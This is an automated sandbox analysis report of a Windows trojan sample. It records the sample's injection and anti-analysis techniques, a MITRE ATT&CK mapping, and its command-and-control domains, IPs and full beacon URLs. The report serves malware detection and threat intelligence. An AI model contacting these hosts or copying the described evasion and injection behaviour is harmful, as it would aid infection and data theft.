          Source: Yara matchFile source: 00000007.00000002.474138939.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256399693.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.220675052.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.LWlcpDjYIQ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.LWlcpDjYIQ.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383953 Sample: LWlcpDjYIQ.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.socialunified.com 2->31 33 www.kaashir.com 2->33 35 HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 5 other signatures 2->49 11 LWlcpDjYIQ.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\Temp\...\9a5t.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Contains functionality to prevent local Windows debugging 11->65 15 LWlcpDjYIQ.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Sample uses process hollowing technique 15->71 73 Queues an APC in another process (thread injection) 15->73 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.huongdandidong.com 108.186.210.142, 49731, 80 PEGTECHINCUS United States 18->37 39 www.luxel01.com 118.27.122.19, 49722, 80 INTERQGMOInternetIncJP Japan 18->39 41 17 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 cmstp.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LWlcpDjYIQ.exe66%ReversingLabsWin32.Trojan.Wacatac

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll24%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.cmstp.exe.45c708.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.LWlcpDjYIQ.exe.1eb20000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.cmstp.exe.4b87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.LWlcpDjYIQ.exe.737f0000.6.unpack100%AviraHEUR/AGEN.1131513Download File
          2.1.LWlcpDjYIQ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.LWlcpDjYIQ.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfi0%Avira URL Cloudsafe
          www.simplyhealrhcareplans.com/sqra/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.socialunified.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhob0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJV0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.orchidandiris.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXy0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iy0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG90%Avira URL Cloudsafe
          http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJV100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ecomcourse.online
          		184.168.131.241
          		truetrue
            		unknown
            www.huongdandidong.com
            		108.186.210.142
            		truetrue
              		unknown
              www.muzhskoy-eskort.site
              		144.76.207.76
              		truetrue
                		unknown
                karizcustomizeme.com
                		160.153.136.3
                		truetrue
                  		unknown
                  www.shopthen2.site
                  		5.101.152.161
                  		truetrue
                    		unknown
                    www.luxel01.com
                    		118.27.122.19
                    		truetrue
                      		unknown
                      orchidandiris.com
                      		34.102.136.180
                      		truefalse
                        		unknown
                        HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com
                        		3.223.115.185
                        		truefalse
                          		high
                          www.simplyhealrhcareplans.com
                          		199.59.242.153
                          		truetrue
                            		unknown
                            lewishackney.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.kaashir.com
                              		208.91.197.27
                              		truetrue
                                		unknown
                                ext-sq.squarespace.com
                                		198.185.159.144
                                		truefalse
                                  		high
                                  www.opusleaf.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.myboardinghome.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.socialunified.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.seymor-law.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.lewishackney.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.ecomcourse.online
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.karizcustomizeme.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.anadelalastra.art
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.orchidandiris.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.huongdandidong.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=94GGx2Cs8EYqYWyk7qEtIIzRN3fkRhfUxg2Vtzz5w0QY/7xu41tS8mQoIQP3aceFOvfitrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    www.simplyhealrhcareplans.com/sqra/true
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    http://www.simplyhealrhcareplans.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoKtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.socialunified.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=nD+8EQ/dkrvxrfeXfZTM4uqVidyysXGGAQQPcyuh+D+qYnXcwF5fcGHppY2Ae0Rizhobtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.lewishackney.com/sqra/?NBZl=RvvWc34iJhU4aDVvCPxlJYXQghZKjT+0jz617RLPtVuesnMs5OzQh/fCAeZj/K6zv/Ow&lzul=wRDL7BohbLBLJVfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.luxel01.com/sqra/?NBZl=l8gFWKa0VIasP4OX6UWILwSCtzkOc3V6oKupITn9HnPx0eDpBTl3az448bd8FGwLkJvi&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.orchidandiris.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=zH8yL9FtafuknHUuv+0OAb189SbLD7IfmvNkOBi8bJNQNfTK09EYjoUTP6M+ilwbYPXyfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ecomcourse.online/sqra/?NBZl=A685XXlO5s8wdT2GSl4VwObxhyaN1usH/ZDf3g436hkZTbYdTSv6UxS6ZdhF3LcC3Fcd&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.karizcustomizeme.com/sqra/?lzul=wRDL7BohbLBLJV&NBZl=+apFroP1TjGnxXEe5oaGEFG1FIGlVaZA9Y5GRttzGQ4z+BPhxNKjikjP31UiUH/cC1Iytrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.shopthen2.site/sqra/?lzul=wRDL7BohbLBLJV&NBZl=0hvqTGsG2LXykKa15oAG/2YmS9ez8HJt/56JneCT4XqEJpzhFqXtEbyiFIIf71vevGG9true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.muzhskoy-eskort.site/sqra/?NBZl=XY+ZErIRkQWtvrbZzW/Q2VqSgxI2oDXvZ0FX1dCtO5jFwgiNlKUf7p0wm51D3p8eN5aQ&lzul=wRDL7BohbLBLJVtrue
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.tiro.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://fontfabrik.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.founder.com.cn/cnexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.jiyu-kobo.co.jp/explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers8explorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.fonts.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.sandoll.co.krexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.urwpp.deDPleaseexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.zhongyicts.com.cnexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.sakkal.comexplorer.exe, 00000005.00000000.236613725.0000000008B46000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown

                                                                        Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        199.59.242.153
                                                                        		www.simplyhealrhcareplans.comUnited States
                                                                        		395082BODIS-NJUStrue
                                                                        198.185.159.144
                                                                        		ext-sq.squarespace.comUnited States
                                                                        		53831SQUARESPACEUSfalse
                                                                        144.76.207.76
                                                                        		www.muzhskoy-eskort.siteGermany
                                                                        		24940HETZNER-ASDEtrue
                                                                        160.153.136.3
                                                                        		karizcustomizeme.comUnited States
                                                                        		21501GODADDY-AMSDEtrue
                                                                        118.27.122.19
                                                                        		www.luxel01.comJapan7506INTERQGMOInternetIncJPtrue
                                                                        5.101.152.161
                                                                        		www.shopthen2.siteRussian Federation
                                                                        		198610BEGET-ASRUtrue
                                                                        34.102.136.180
                                                                        		orchidandiris.comUnited States
                                                                        		15169GOOGLEUSfalse
                                                                        184.168.131.241
                                                                        		ecomcourse.onlineUnited States
                                                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                        108.186.210.142
                                                                        		www.huongdandidong.comUnited States
                                                                        		54600PEGTECHINCUStrue
                                                                        3.223.115.185
                                                                        		HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comUnited States
                                                                        		14618AMAZON-AESUSfalse

                                                                        General Information

                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                        Analysis ID:383953
                                                                        Start date:08.04.2021
                                                                        Start time:12:59:21
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 10m 0s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:LWlcpDjYIQ.exe
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:31
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@7/3@15/10
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 23.8% (good quality ratio 21.6%)
                                                                        • Quality average: 75%
                                                                        • Quality standard deviation: 30.8%
                                                                        HCA Information:
                                                                        • Successful, ratio: 90%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        • Found application associated with file extension: .exe
                                                                        Warnings:
                                                                        Show All
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 23.54.113.53, 13.64.90.137, 52.147.198.201, 104.42.151.234, 104.43.139.144, 13.88.21.125, 95.100.54.203, 20.82.209.183, 13.107.4.50, 23.10.249.43, 23.10.249.26, 20.54.26.129, 20.82.209.104
                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, afdap.au.au-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, au.au-msedge.net, Edge-Prod-ZRH.env.au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383953/sample/LWlcpDjYIQ.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        No simulations

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        199.59.242.153RCS76393.exeGet hashmaliciousBrowse
                                                                        • www.addthat.xyz/goei/?EzuXh6BP=WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==&RL0=rVvxj02xpd_lyz
                                                                        PaymentAdvice.exeGet hashmaliciousBrowse
                                                                        • www.sgdivergence.com/c22b/?GPi8=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ71wwJK0guSYZ&ary=tXLpzhFpgBj4m
                                                                        0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                        • www.mybodtonheart.com/bei3/?8p=EZa0cv&2d=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzOxundmeb0pk/R87Q==
                                                                        RFQ_ V-21-Kiel-050-D02.xlsxGet hashmaliciousBrowse
                                                                        • www.krishnagiri.info/nsag/?MDK0g=hPHybZPWty89zdC7zz6D1Y5bPXZXETq0TT3iYhuvTaEiGqMWh7BB5kcULROPrIgmxQ/f1w==&UB=hR-4brtxaT5D4f3
                                                                        New Order.exeGet hashmaliciousBrowse
                                                                        • www.friendsed.com/ditf/?KvZpwPd=7CjyIVchQZXwoSp1jc0tC17NVLbOMlIdjZlIPcHCPGe34LEeqGe9fWkqZA8O62TU4Lu3&ARn=BjAtCdjxOrQ8pTgP
                                                                        ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                        • www.simplyhealrhcareplans.com/sqra/?Rl=n3U7aY9a5ujS+qWiRfdW0plv/0Nv8djS+qMboD1ih5qiP+MT365v99ebZUVRUFJkYzoK&_jqT2L=gBg8BF3ptlc
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • www.mybodtonheart.com/bei3/?M4YDYvh=yiVLv/mU1trn0FqDcpsMmhM8eVaNKk/wrW0n1zaKB+0dUktd9YtDHn8fCzCIiGxmJdo4&Rl=M48tiJch
                                                                        Order.exeGet hashmaliciousBrowse
                                                                        • www.getbacklink.net/cugi/?BlL=15D5Rlw69THVEJtjRVEnjixvCWz0IM/dTd5neGnMhVDDO36KfpjGt1+SA4NLCUy6JvG/&EZXpx6=tXExBh8PdJwpH
                                                                        PaymentInvoice.exeGet hashmaliciousBrowse
                                                                        • www.sgdivergence.com/c22b/?9rgH70GX=cbaAnqZg13PDvDAp4rbrvZjl753VAJ/hVAzUOls5TeU5Jx4pkABxsKYQ72QgGrkYw3xe&LL0=X4XDHNl0z
                                                                        SB210330034.pdf.exeGet hashmaliciousBrowse
